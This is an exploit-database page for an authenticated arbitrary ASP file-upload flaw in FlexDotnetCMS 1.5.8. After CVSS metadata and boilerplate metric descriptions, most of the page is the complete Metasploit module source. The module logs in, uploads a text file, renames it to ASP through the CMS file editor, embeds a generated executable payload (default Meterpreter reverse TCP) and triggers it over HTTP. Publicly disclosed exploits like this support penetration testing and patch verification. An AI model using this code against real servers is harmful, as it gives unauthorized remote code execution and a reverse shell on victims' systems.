Exploitalert - Database of Exploits

FlexDotnetCMS 1.5.8 Arbitrary ASP File Upload

CVE	Category	Price	Severity
N/A	CWE-434	N/A	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2020-12-10

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2020120074

FlexDotnetCMS 1.5.8 Arbitrary ASP File Upload

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'FlexDotnetCMS Arbitrary ASP File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary commands with elevated privileges. The module first tries to authenticate to FlexDotnetCMS via an HTTP POST request to `/login`. It then attempts to upload a random TXT file and subsequently uses the FlexDotnetCMS file editor to rename the TXT file to an ASP file. If this succeeds, the target is vulnerable and the ASP file is generated as a copy of the TXT file, which remains on the server. Next, the module sends another request to rename the TXT file to an ASP file, this time adding the payload. Finally, the module tries to execute the ASP payload via a simple HTTP GET request to `/media/uploads/asp_payload` Valid credentials for a FlexDotnetCMS user with permissions to use the FileManager are required. This module has been successfully tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik Wynter' # @wyntererik - Discovery & Metasploit ], 'References' => [ ['CVE', '2020-27386'], ], 'Platform' => 'win', 'Targets' => [ [ 'Windows (x86)', { 'Arch' => [ARCH_X86], 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } } ], [ 'Windows (x64)', { 'Arch' => [ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2020-09-28' ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to FlexDotnetCMS', '/']), OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', '']) ] end def rename_file(res, payload) # obtain tokens required for renaming the payload html = res.get_html_document viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]') event_validation = html.at('input[@id="__EVENTVALIDATION"]') if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values return 'no_tokens' end viewstate_key = viewstate_key['value'] event_validation = event_validation['value'] # rename TXT payload to ASP using the file editor, this creates a copy of the TXT file, so both have to be deleted (this happens in cleanup) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'), 'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" }, 'vars_post' => { '__EVENTTARGET' => 'ctl00$ContentPlaceHolder1$Save', '__VIEWSTATEKEY' => viewstate_key, '__EVENTVALIDATION' => event_validation, 'ctl00$ContentPlaceHolder1$FileSelector$SelectedFile' => "/media/uploads/#{@payload_asp}", 'ctl00$ContentPlaceHolder1$Editor' => payload } }) end def check # used to ensure cleanup only runs against flexdotnetcms targets @skip_cleanup = true # visit login the page to get the necessary cookies res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'login/'), 'keep_cookies' => true }) unless res return CheckCode::Unknown('Connection failed') end # the login page doesn't contain the name of the app or the author, so we're combining a bunch of checks to limit the odds of failing to flag an incorrect target unless res.code == 200 && res.body.include?('<title>Login - Home</title>') && res.body.include?('<label>Email</label><br>') && res.body.include?('>Forgot my password</a>') return CheckCode::Safe('Target is not a FlexDotnetCMS application.') end # get cookies and tokens necessary for authentication html = res.get_html_document viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]') event_validation = html.at('input[@id="__EVENTVALIDATION"]') if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values return CheckCode::Detected('Received unexpected response while trying to obtain tokens necessary for authentication from /login') end viewstate_key = viewstate_key['value'] event_validation = event_validation['value'] # perform login to verify if the target is a FlexDotnetCMS application res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login/'), 'keep_cookies' => true, 'vars_post' => { # ideally the % in the line below would not be encoded, but I don't know how to achieve that without reverting to send_request_raw, which is ugly, and this works 'LoginControl$ctl00' => 'LoginControl$ctl01%7CLoginControl$LoginButton', '__EVENTTARGET' => 'LoginControl$LoginButton', '__VIEWSTATEKEY' => viewstate_key, 'LoginControl$Username' => datastore['USERNAME'], 'LoginControl$Password' => datastore['PASSWORD'], '__EVENTVALIDATION' => event_validation, '__ASYNCPOST' => 'true' } }) unless res return CheckCode::Detected('Connection failed') end unless res.code == 200 && res.body.include?('pageRedirect||%2fadmin') return CheckCode::Detected('Failed to authenticate to the server.') end # visit the backend dashboard res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'Admin/') unless res return CheckCode::Detected('Connection failed') end unless res.code == 200 && res.body.include?('Welcome to your site editor:') return CheckCode::Detected('Received unexpected response while trying to follow redirect to /Admin/') end print_good('Successfully authenticated to FlexDotnetCMS') # prepare to upload a TXT file and rename it to an ASP file. If this works, the target is vulnerable. # generate file names and post data @payload_txt = "#{rand_text_alphanumeric(6..10)}.txt" @payload_asp = @payload_txt.split('.txt')[0] << '.asp' post_data = Rex::MIME::Message.new post_data.add_part('\\media\\uploads\\', nil, nil, 'form-data; name="folder"') post_data.add_part(rand_text_alpha(10..20), 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{@payload_txt}\"") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'Scripts', 'tinyfilemanager.net', 'dialog.aspx'), 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'Accept' => 'application/json', 'X-Requested-With' => 'XMLHttpRequest', 'X-File-Name' => @payload_txt }, 'vars_get' => { 'cmd' => 'upload' }, 'data' => post_data.to_s }) @skip_cleanup = false # cleanup only has to run if at least one attempt to upload a file has been made vprint_status("Uploading test file #{@payload_txt}...") unless res return CheckCode::Detected("Connection failed while trying to upload test file #{@payload_txt}") end unless res.code == 200 return CheckCode::Detected("Received unexpected response while trying to upload test file #{@payload_txt}") end # load the test file in the file editor in order to obtain tokens required for renaming it res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'), 'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" } }) unless res return CheckCode::Detected("Connection failed while trying to open test file #{@payload_txt} in the file editor") end unless res.code == 200 && res.body.include?('Successfully loaded file') return CheckCode::Detected("Received unexpected response while trying to open test file #{@payload_txt} in the file editor") end # FlexDotNetCMS displays the full installation path on the server in response to the previous GET request, so we can print it flexdotnetcms_path = res.body.scan(/jQuery\.jGrowl\(\"Successfully loaded file \( (.*?)WebApplication/).flatten.first unless flexdotnetcms_path.blank? print_status("FlexDotnetCMS is installed on the target at #{flexdotnetcms_path}") end print_status("Uploaded test file #{@payload_txt}. Attempting to rename the file to #{@payload_asp}...") res = rename_file(res, rand_text_alpha(10..20)) if res == 'no_tokens' return CheckCode::Detected("Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}") end unless res return CheckCode::Detected("Connection failed while trying to rename the test file #{@payload_txt}.") end unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}") vprint_status("Failed to use the file editor to rename test file #{@payload_txt} to #{@payload_asp}") return CheckCode::Safe('Target is FlexDotnetCMS v1.5.9 or higher') end print_good("Successfully renamed test file #{@payload_txt} to #{@payload_asp} (this is a copy of #{@payload_txt}, which remains on the server)") return CheckCode::Vulnerable('Target is FlexDotnetCMS v1.5.8 or lower.') end def rename_test_file_and_add_payload print_status("Renaming #{@payload_txt} to #{@payload_asp} again, this time adding the payload") # load the file in the file editor in order to obtain tokens required for renaming it res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'), 'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" } }) unless res fail_with(Failure::Disconnected, "Connection failed while trying to open #{@payload_txt} in the file editor") end unless res.code == 200 && res.body.include?('Successfully loaded file') fail_with(Failure::UnexpectedReply, "Received unexpected response while trying to open #{@payload_txt} in the file editor") end # genenerate ASP payload, then rename the TXT file again while adding the payload exe = generate_payload_exe payload = Msf::Util::EXE.to_exe_asp(exe).to_s res = rename_file(res, payload) if res == 'no_tokens' fail_with(Failure::UnexpectedReply, "Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}") end unless res fail_with(Failure::Disconnected, 'Connection failed while trying to add the ASP payload.') end unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}") fail_with(Failure::Unknown, 'Failed to add the ASP payload.') end print_good("Successfully added the ASP payload to #{@payload_asp}") end def cleanup # only run when at least one attempt to upload a file has been made return if @skip_cleanup # delete uploaded TXT and ASP files [@payload_txt, @payload_asp].each do |file| res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'Scripts', 'tinyfilemanager.net', 'dialog.aspx'), 'vars_get' => { 'cmd' => 'delfile', 'file' => "\\media\\uploads\\#{file}", 'currpath' => '\\media\\uploads\\' } }) unless res && res.code == 200 && res.body.exclude?(file) print_error("Failed to delete #{file}.") print_warning("Manual cleanup of #{file} is required.") return end print_good("Successfully deleted #{file}") end end def exploit rename_test_file_and_add_payload print_status('Executing the payload...') res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'media', 'uploads', @payload_asp.to_s) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to execute the payload.') end unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Received unexpected response while trying to execute the payload') end end end

Impressum